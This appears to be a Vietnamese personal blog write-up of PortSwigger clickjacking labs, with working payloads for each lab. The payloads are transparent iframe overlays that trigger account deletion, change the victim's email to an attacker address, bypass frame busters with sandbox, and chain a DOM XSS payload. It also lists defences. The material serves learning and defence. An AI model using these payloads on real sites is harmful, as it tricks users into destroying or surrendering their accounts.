<!doctype html>
<html lang="en-us">
  <head>
    <title>Clickjacking // DatNLQ</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.88.1" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="DatNLQ" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="https://datnlq.github.io/css/main.min.4a7ec8660f9a44b08c4da97c5f2e31b1192df1d4d0322e65c0dbbc6ecb1b863f.css" />

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Clickjacking"/>
<meta name="twitter:description" content="Clickjacking Nhân dịp trên mạng đang nổi trội những người thân bạn bè pay acc fb ngay trong 1 đêm thì mình có cảm hứng để làm về lổ hỗng Clickjacking
Clickjacking là gì ? Nói ngắn gọn dễ hiểu nhất là một hình thức tấn công đánh lừa người dùng nhấp chuột vô ý vào một đối tượng trên website(ví dụ cụ thể ở đây là fb). Khi nhấp chuột vào một đối tượng trên màn hình, người dùng nghĩ là mình đang click vào đối tượng đó nhưng thực chất họ đang bị lừa click vào một đối tượng khác &gt; đã bị làm mờ hay ẩn đi."/>

    <meta property="og:title" content="Clickjacking" />
<meta property="og:description" content="Clickjacking Nhân dịp trên mạng đang nổi trội những người thân bạn bè pay acc fb ngay trong 1 đêm thì mình có cảm hứng để làm về lổ hỗng Clickjacking
Clickjacking là gì ? Nói ngắn gọn dễ hiểu nhất là một hình thức tấn công đánh lừa người dùng nhấp chuột vô ý vào một đối tượng trên website(ví dụ cụ thể ở đây là fb). Khi nhấp chuột vào một đối tượng trên màn hình, người dùng nghĩ là mình đang click vào đối tượng đó nhưng thực chất họ đang bị lừa click vào một đối tượng khác &gt; đã bị làm mờ hay ẩn đi." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://datnlq.github.io/posts/clickjacking/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2021-09-28T23:25:50+07:00" />
<meta property="article:modified_time" content="2021-09-28T23:25:50+07:00" />



  </head>
  <body>
    <header class="app-header">
      <a href="https://datnlq.github.io/"><img class="app-header-avatar" src="/avatar.jpg" alt="DatNLQ" /></a>
      <h1>DatNLQ</h1>
      <p>DatNLQ&#39;s personal website</p>
      <div class="app-header-social">
        
          <a href="https://github.com/datnlq" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-github">
  <title>My Github</title>
  <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
</svg>
          </a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">Clickjacking</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Sep 28, 2021
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          7 min read
        </div>
      </div>
    </header>
    <div class="post-content">
      <h1 id="clickjacking">Clickjacking</h1>
<p>Nhân dịp trên mạng đang nổi trội những người thân bạn bè pay acc fb ngay trong 1 đêm thì mình có cảm hứng để làm về lổ hỗng <a href="https://portswigger.net/web-security/clickjacking">Clickjacking</a></p>
<h2 id="clickjacking-là-gì-">Clickjacking là gì ?</h2>
<p>Nói ngắn gọn dễ hiểu nhất là một hình thức tấn công đánh lừa người dùng nhấp chuột vô ý vào một đối tượng trên website(ví dụ cụ thể ở đây là fb). Khi nhấp chuột vào một đối tượng trên màn hình, người dùng nghĩ là mình đang click vào đối tượng đó nhưng thực chất họ đang bị lừa click vào một đối tượng khác &gt; đã bị làm mờ hay ẩn đi. Kẻ tấn công có thể sử dụng kỹ thuật tấn công này cho nhiều mục đích. Đánh cắp tài khoản người dùng, lừa click vào quảng cáo để kiếm tiền, lừa like page hoặc nguy hiểm hơn là cài một webshell lên máy chủ web.</p>
<h2 id="có-thể-khai-thác-lỗ-hổng-này-như-thế-nào-">Có thể khai thác lỗ hổng này như thế nào ??</h2>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">  + Hacker có thể lấy cắp thông tin đăng nhập của bạn thông qua 1 cái form fake trông có vẻ giống giống trang thật.
  + Lừa người dùng mở web-cam hoặc microphone bằng cách hiển thị các yếu tố vô hình trên trang cài đặt Adobe Flash.
  + Phát tán worms trên các trang mạng xã hội.
  + Phát tán malware bằng cách chuyển hướng người dùng tới link download chương trình độc hại.
  + Quảng cáo lừa đảo.
</code></pre></div><h2 id="cách-ngăn-chặn-clickjacking">Cách ngăn chặn Clickjacking</h2>
<p>Clickjacking tấn công bằng cách bao bọc trang web mà người dùng tin tưởng bởi <em>iframe</em> sau đó render ẩn phần tử này lên trên cùng. Để ngăn chặn lỗ hổng này các bạn có thể sử dụng các cách sau :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">  + X-Frame-Options
  + Content Security Policy
  + Frame-Killing

</code></pre></div><h2 id="clickjacking-lab">Clickjacking Lab</h2>
<h3 id="lab-basic-clickjacking-with-csrf-token-protection">Lab: Basic clickjacking with CSRF token protection</h3>
<p>Bài lab đã mô tả rõ ràng cho chúng ta cách thức để exploit lỗ hổng này chính là khai thác nút Delete Account bằng cách tạo ra 1 nút ảo đè lên và đánh lừa người dùng.
Account : wiener:peter</p>
<p>Nhắc lại sơ về Clickjacking đó chính là sẽ tạo 1 btn ảo đè lên btn mà mình muốn nhằm đánh lừa người dùng, điều đó có nghĩa chúng ta phải dùng HTML để tạo khung sao cho btn ảo đè đúng lên ngay btn thật.
Truy cập bài lab thì chúng ta có thể thấy 1 blog như sau, và có chức năng My account như sau:</p>
<p><img src="https://github.com/datnlq/Source/blob/main/Clickjacking/image/clickjacking_protection.jpg?raw=true" alt="img"></p>
<p>Có 1 vài chỉ dẫn về struct của html mà chúng ta sẽ exploit như sau :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">&lt;head&gt;
  &lt;style&gt;
    #target_website {
      position:relative;
      width:128px;
      height:128px;
      opacity:0.00001;
      z-index:2;
      }
    #decoy_website {
      position:absolute;
      width:300px;
      height:400px;
      z-index:1;
      }
  &lt;/style&gt;
&lt;/head&gt;
...
&lt;body&gt;
  &lt;div id=&#34;decoy_website&#34;&gt;
  ...decoy web content here...
  &lt;/div&gt;
  &lt;iframe id=&#34;target_website&#34; src=&#34;https://vulnerable-website.com&#34;&gt;
  &lt;/iframe&gt;
&lt;/body&gt;
</code></pre></div><p><img src="https://github.com/datnlq/Source/blob/main/Clickjacking/image/clickjacking_protection_deleteacc.jpg?raw=true" alt="img"></p>
<p>Tuy nhiên để phù hợp với HTML của trang web mà chúng ta đã đăng nhập vào và tương ứng với nút DeleteAccount thì chúng ta sẽ thay đổi như sau :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">&lt;style&gt;
   iframe {
       position:relative;
       width: 500px;
       height: 700px;
       opacity: 0.0001;
       z-index: 2;
   }
   div {
       position:absolute;
       top:510px;
       left:80px;
       z-index: 1;
   }
&lt;/style&gt;
&lt;div&gt;Click me&lt;/div&gt;
&lt;iframe src=&#34;https://ac061f661e51bedf80356b5100af000a.web-security-academy.net/my-account&#34;&gt;&lt;/iframe&gt;

</code></pre></div><p>Để đè được lên btn có sẳn trên trang web thì chúng ta phải có sự hỗ trợ của 1 exxploit server. Về tác dụng của exploit server cơ bản sẽ là giúp chúng ta đè khung HTML của chúng ta lên web site đích.
<img src="https://github.com/datnlq/Source/blob/main/Clickjacking/image/clickjacking_protection_exploitserve.jpg?raw=true" alt="img"></p>
<p>Sau khi store cho payload lên web site mà chúng ta muốn, chúng ta có thể view exploit để check xem btn của mình đã đè lên real btn chưa.
<img src="https://github.com/datnlq/Source/blob/main/Clickjacking/image/clickjacking_protection_checkbtn.jpg?raw=true" alt="img"></p>
<h3 id="lab-clickjacking-with-form-input-data-prefilled-from-a-url-parameter">Lab: Clickjacking with form input data prefilled from a URL parameter</h3>
<p>Như mô tả thì đây là bài mở rộng của lab trên nên về cơ bản các bước chúng ta cũng làm tương tự như trên.</p>
<p>Tuy nhiên vì đây là chức năng update email. chúng ta có thể dùng nó để update email của chúng ta và leak thông tin.
Dùng burpSuite để bắt lại request khi update email.</p>
<p><img src="https://github.com/datnlq/Source/blob/main/Clickjacking/image/clickjacking_param_request.jpg?raw=true" alt="img"></p>
<p>Điều đó làm thay đổi cấu trúc của link mà chúng ta chèn vào trong khung HTML được dựng:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">&lt;style&gt;
   iframe {
       position:relative;
       width:500px;
       height: 700px;
       opacity: 0.0001;
       z-index: 2;
   }
   div {
       position:absolute;
       top:440px;
       left:50px;
       z-index: 1;
   }
&lt;/style&gt;
&lt;div&gt;Click me&lt;/div&gt;
&lt;iframe src=&#34;https://acfc1f101e46e458806d5c3d00b0004c.web-security-academy.net/my-account?email=hacker@attacker-website.com&#34;&gt;&lt;/iframe&gt;
</code></pre></div><p>Phần <em><a href="mailto:email=hacker@attacker-website.com">email=hacker@attacker-website.com</a></em> chính là phần chúng ta thêm email của hacker để leak thông tin.</p>
<h3 id="lab-clickjacking-with-a-frame-buster-script">Lab: Clickjacking with a frame buster script</h3>
<p>Bài lab này đã cho chúng ta biết dùng lại kỹ thuật của 2 bài lab trên là vô dụng, và đưa ra 1 hướng mới cho chúng ta khai thác.</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">Frame busting techniques are often browser and platform specific and because of the flexibility of HTML 
they can usually be circumvented by attackers. As frame busters are JavaScript then the browser&#39;s security 
settings may prevent their operation or indeed the browser might not even support JavaScript. An effective
attacker workaround against frame busters is to use the HTML5 iframe sandbox attribute. When this is set with 
the allow-forms or allow-scripts values and the allow-top-navigation value is omitted then the frame buster 
script can be neutralized as the iframe cannot check whether or not it is the top window:

&lt;iframe id=&#34;victim_website&#34; src=&#34;https://victim-website.com&#34; sandbox=&#34;allow-forms&#34;&gt;&lt;/iframe&gt;
</code></pre></div><p>Như vậy là chúng ta đã có hướng giải quyết cho vấn đề, chúng ta dùng sandbox = allow-forms để vô hiệu hóa, vậy chúng ta truy cập exploit server để bắt đầu thực hiện xây dựng khung HTML
<img src="https://github.com/datnlq/Source/blob/main/Clickjacking/image/clickjacking_script.jpg?raw=true" alt="img"></p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">&lt;style&gt;
   iframe {
       position:relative;
       width:500px;
       height: 700px;
       opacity: 0.0001;
       z-index: 2;
   }
   div {
       position:absolute;
       top:440px;
       left:50px;
       z-index: 1;
   }
&lt;/style&gt;
&lt;div&gt;Click me&lt;/div&gt;
&lt;iframe sandbox=&#34;allow-forms&#34;
src=&#34;https://ac6f1fa31ecac23380c4079b000d00fe.web-security-academy.net/my-account?email=hacker@attacker-website.com&#34;&gt;&lt;/iframe&gt;
</code></pre></div><p><img src="https://github.com/datnlq/Source/blob/main/Clickjacking/image/clickjacking_script_checkbtn.jpg?raw=true" alt="img"></p>
<p>Để có được payload như trên phải căn chỉnh nhiều lần để rút ra được những thông số như thế.</p>
<h3 id="lab-exploiting-clickjacking-vulnerability-to-trigger-dom-based-xss">Lab: Exploiting clickjacking vulnerability to trigger DOM-based XSS</h3>
<p>Bài lab mô tả về lỗ hổng để chúng ta khai thác là lỗ hổng XSS để gọi hàm print thì sẽ thành công qua bài lab.
Đầu tiên chúng ta có payload để exploit lỗi XSS và gọi hàm print() :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">&lt;img src=1 onerror=print()&gt;
</code></pre></div><p><img src="https://github.com/datnlq/Source/blob/main/Clickjacking/image/clickjacking_xss_check.jpg?raw=true" alt="img"></p>
<p>Sau đó chúng ta test thử xem các ô có ô nào bị lỗi XSS thì thấy là biến name không hề validate input đầu vào =&gt; exploit name + HTML struct</p>
<p>Chúng ta có payload sau để exploit web site:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">&lt;style&gt;
   iframe {
       position:relative;
       width:500px;
       height: 700px;
       opacity: 0.0001;
       z-index: 2;
   }
   div {
       position:absolute;
       top:630px;
       left:60px;
       z-index: 1;
   }
&lt;/style&gt;
&lt;div&gt;click me&lt;/div&gt;
&lt;iframe
src=&#34;https://acb41f951f633851803d2471000c00bf.web-security-academy.net/feedback?name=&lt;img src=1 onerror=print()&gt;&amp;email=hacker@attacker-website.com&amp;subject=test&amp;message=test#feedbackResult&#34;&gt;&lt;/iframe&gt;
</code></pre></div><p>Truy cập exploit server để store lên web site mà chúng ta cần exploit :
<img src="https://github.com/datnlq/Source/blob/main/Clickjacking/image/clickjacking_xss_exploitserver.jpg?raw=true" alt="img"></p>
<p>Trong quá trình xây dựng khung HTML cho chính xác chúng ta có thể dùng View Exploit để kiểm tra xem đã đúng vị trí hay chưa.
<img src="https://github.com/datnlq/Source/blob/main/Clickjacking/image/clickjacking_xss_checkbtn.jpg?raw=true" alt="img"></p>
<p>Sau khi khung HTML đã vào đúng vị trí và có thể exploit thì chúng ta Deliver to vivtim để solve bài lab.</p>
<p><img src="https://github.com/datnlq/Source/blob/main/Clickjacking/image/clickjacking_xss_solve.jpg?raw=true" alt="img"></p>
<h3 id="lab-multistep-clickjacking">Lab: Multistep clickjacking</h3>
<p>Bài lab mô tả rằng để chống lại Clickjacking web site đã thêm 1 xác nhận thứ 2. Vì vậy để có thể khai thác được chúng ta phải tạo ra 2 btn để đè lên 2 nút mới được tạo ra. Dựa vào lý thuyết đó</p>
<p><img src="https://github.com/datnlq/Source/blob/main/Clickjacking/image/clickjacking_multi.jpg?raw=true" alt="img"></p>
<p>Sau đây là cách thêm btn check để ngăn chặn Clickjacking :D</p>
<p><img src="https://github.com/datnlq/Source/blob/main/Clickjacking/image/clickjacking_multi_checkdell.jpg?raw=true" alt="img"></p>
<p>Tương tự như những bài trên, nhưng lần này chúng ta phải xây dựng 2 btn và check 2 btn sao cho giống với web site gốc :D</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">&lt;style&gt;
   iframe {
       position:relative;
       width:500px;
       height: 700px;
       opacity: 0.0001;
       z-index: 2;
   }
   .firstClick, .secondClick {
       position:absolute;
       top:480px;
       left:50px;
       z-index: 1;
   }
   .secondClick {
       top:285px;
       left:220px;
   }
&lt;/style&gt;
&lt;div class=&#34;firstClick&#34;&gt;Click me first&lt;/div&gt;
&lt;div class=&#34;secondClick&#34;&gt;Click me next&lt;/div&gt;
&lt;iframe src=&#34;https://accc1f5d1e509cb48060b032006d00e5.web-security-academy.net/my-account&#34;&gt;&lt;/iframe&gt;
</code></pre></div><p>Sau khi check thành công thì Delever để solve bài lab</p>
<p><img src="https://github.com/datnlq/Source/blob/main/Clickjacking/image/clickjacking_multi_exploitserver.jpg?raw=true" alt="img"></p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
